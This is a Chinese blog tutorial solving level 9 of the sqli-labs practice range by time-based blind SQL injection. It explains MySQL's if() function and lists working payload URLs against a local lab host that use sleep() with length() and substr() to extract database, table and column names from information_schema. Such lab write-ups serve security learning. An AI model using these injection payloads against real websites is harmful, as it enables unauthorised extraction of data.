SQL闯关第九关

已于 2023-08-31 20:43:59 修改
阅读量119 收藏 2
点赞数 1
分类专栏: SQL闯关 网络安全 文章标签: sql 数据库 网络安全 网络 安全
于 2023-08-28 17:35:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/132533643
版权

文章目录

前言

这篇文章将介绍sql闯关中第九关的通关过程。第九关图片如下。笔者推荐使用火狐浏览器进行打开,当然本文的基础是在读者已经安装了sql靶场和Wampserver64的基础之上。注意要先打开Wampserver64然后才能打开sql靶场。同时建议读者下载Hackbar这个扩展包,在火狐浏览器中的管理扩展里就能下载,下载扩展中可能会出现以下问题。主要是扩展包是否要付费。这里下载Hackbar V2这个现在是免费的。Hackbar已经变成付费。

同时在本文介绍了SQL注入中的延时注入形式。对于SQL第九关用的就是SQL中的延时注入。

延迟注入

延迟注入常用到的函数if(expr1,expr2,expr3)

if(expr1,expr2,expr3)

运行过程:如果expr1正确,执行expr2,不执行expr3

                  如果expr1错误,不执行expr2,执行expr3

闯关过程

1:在末尾添加特殊字符,看SQL注入第九关的反应

分别用到以下两个URL

http://192.168.182.30/sql/Less-9/?id=1'%23
http://192.168.182.30/sql/Less-9/?id=1"%23

以上两个URL展示的页面分别如下

这里不要认为笔者写的有问题,相反这里我们要用到SQL注入中的延时(时间)注入

以下对第九关进行闯关,详细的步骤如下。

2:通过在URL中写入延时函数,进一步判断

输入的URL地址如下

http://192.168.182.30/sql/Less-9/?id=1' and sleep(5)%23

结果显示如下

注意:Less之前有一个横杠在不断地移动,说明我们的延时注入函数执行了。因此可以进一步确定SQL注入的第九关中的包裹符是单引号。

3:爆破出库的字符长度

输入的URL地址如下

http://192.168.182.30/sql/Less-9/?id=1' and if(length(database())=8,sleep(5),1)%23

结果显示如下

注意:由于我们提前知道库的名字为security,也就是说库的字符串的长度是8。因此在运行这段URL地址时if函数第一个参数正确,执行第二个参数。执行结果为睡眠5秒。进而说明库的字符串的长度为8。

4:爆破出库的全称

输入的URL地址如下

http://192.168.182.30/sql/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(5),1)%23

这里可以用到Burpsuite的集束炸弹进行爆破出库的全称为security。

Burpsuite中的显示界面如下。

5:爆破出表的字符长度

运行的URL地址如下。

http://192.168.182.30/sql/Less-9/?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1)%23

运行的结果如下。

注意:这里通过Burpsuite集束炸弹爆破出第一个表的长度为6位。之后要进行爆破其他表的长度只需要修改这个URL地址中的指定参数就可以实现。

6:爆破出表的全称

运行的URL地址如下。

http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='p',sleep(5),1)%23

运行的结果如下。

注意:这里通过Burpsuite集束炸弹爆破出第一个表的全称为emails,其他的表名也可以修改相应的参数进行爆破。

7:爆破出表中的字段名

运行的URL地址为。

http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='a',sleep(5),1)%23

运行的结果如下。

注意:这里爆破通过集束炸弹爆破出的是emails表中的第一个字段,第一个字段的名字为id

总结

SQL注入中的延时注入漏洞主要是在输入正确或者错误的地址网页显示是没有变化的,像联合注入和布尔盲注,报错注入这样的注入攻击方式不好用时,对其进行延时注入。本文在介绍了if(expr1,expr2,expr3)这个函数的用法的同时,介绍了SQL第九关的闯关流程。希望能给读者带来一点启发。

转瞬都有
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs闯关小游戏21-65.docx
10-23
第23展示了`%00`作为特殊的注释符如何影响SQL解析,并演示了如何通过`ORDER BY`语句探测列的数量。同时,攻击者尝试了获取数据库名、表名和列名,以及`users`表中的数据,展示了完整的SQL注入攻击流程。 第24...
sql_lab_第5 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相下载链接:https://github.com/Audi-1/sqli-labs
sqllab第九笔记
I_WORM的博客
03-13 222
通过bp进行抓包,当前构造的payload:id=1%27%20and%20if((mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27),sleep(5),1)--+需要重点说一下的是设置一下bp的项目超时时间;这样就只剩下timeout的数据了,通过payload1进行排序就得到了规整易读的表名信息。
sqli靶场通之less9
sunxueer的博客
07-19 1228
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
sqli-labs卡9(基于get提交的单引号闭合的时间盲注)通思路
zyh1588的博客
10-31 597
小白回顾sqli-labs靶场第九(时间盲注)
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1606
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli靶场学习记录-第九、十
qq_50744304的博客
08-05 94
sleep()用python写一些poc自动化脚本或者木马会经常使用到,数据库也有这样的方法,让页面休眠,例如sleep(5)就是让页面休眠5秒if(a,b,c)if判定语句很常见,这里的if类似三元运算符,括号内有三个值,第一个是判定条件,第二个和第三个是返回值,判定为true,执行第二个值,判定为false则执行第三个值。
基于Vue3和Elment Plus的在线编程闯关挑战网站设计源码
04-03
本设计源码提供了一个基于Vue3和Elment Plus的在线编程闯关挑战网站。项目包含166个文件,主要使用JavaScript、Vue、CSS和HTML编程语言。文件类型包括49个JavaScript脚本文件、35个Markdown文档、34个SQL数据库文件...
C#课程设计索尼克闯关游戏c#源码+数据库+使用详细说明.7z
12-16
《C#课程设计:索尼克闯关游戏的深度解析与实践》 在计算机科学与信息技术领域,课程设计是培养学生实际编程能力的重要环节。本资源集合提供了一个基于C#语言的索尼克闯关游戏的完整源码,搭配了数据库设计及详尽的...
SQL了解第一章
03-14
数据库简介,和基本知识安装条件,只是基础,基础中的第一章
sqli-labs靶场第九
gou1791241251的博客
12-26 1518
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六的盲注,把条件换成沉睡10秒即可。 ...
iwebsec靶场 SQL注入漏洞通笔记9- 双写键字绕过
mooyuan的博客
11-29 1375
打开靶场第09,http://192.168.71.151/sqli/09.php?id=1如下所示​SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第9卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了键字?很明显通过源码,iwebsec的第09卡过滤了不区分大小写select键字。
sql注入第九------延时注入
qq_45751902的博客
03-14 4420
无论输入什么闭合符号回显都是正确的,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。 先引入几个函数 1.if(Condition,A,B)函数 2.当Condition为TRUE时,返回A;当Condition为FALSE时,返回B。 3.sleep()函数 网页延迟n秒后,输出结果 4.left()函数 左边数,取几个数 5.substr(var1, var2, var3) 功能:从字符串里截取其中一段字符(串) - va
张小白的渗透之路(九)-SQL注入详细操作步骤-报错注入
Litbai_zhang
11-22 596
报错注入 1.报错注入原理 构造payload让信息通过错误提示回显出来 ps: payload就是代码中最键的数据, 比如:查找用户名,这条命令中,用户名就是最键的数据 2.报错注入条件 查询不回显错误的信息不回显内容,会打印错误信息 update、insert等语句,会打印错误信息 3.报错注入方法 凡是可以让错误信息显示的函数(语句),都能实现报错注入,这里我们列举1种。 floor...
BTS测试实验室 --- SQL注入攻略
wkend的博客
10-25 721
一. Sql注入1 判断注入点:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1’ 如下图,报错,存在sql注入 手工注入, (1)爆字段数: http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 order by 4,页面返回正常 http://127.0.0.1/b...
sqli-labs靶场9-10(时间盲注)
qq_46527080的博客
12-12 1124
知识点 函数 if()函数 条件判断函数 if(a,b,c) if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c; sleep()函数 网页延迟n秒后,输出结果 left()函数 从左边数,取几个数 例如:left(abcdef,3) 取3位左边的数,就是abc 第九 源码分析: 开搞 一、判断注入点(需要用到sleep函数) ?id=1')and (sleep(4)) --+ (耗时2s,这是正常的页面,没有闭合的页面) ?id=1'an
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
最新发布
技术笔记
07-17 667
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
cao919的专栏Net
07-13 768
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
MySQL 进阶(三)【SQL 优化】
梦想是动物管理员
07-13 1255
MySQL SQL 优化
sqllibs 闯关
08-25
- *1* *3* [sql-lib 闯关课程第一课](https://blog.csdn.net/m0_37175113/article/details/105753588)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值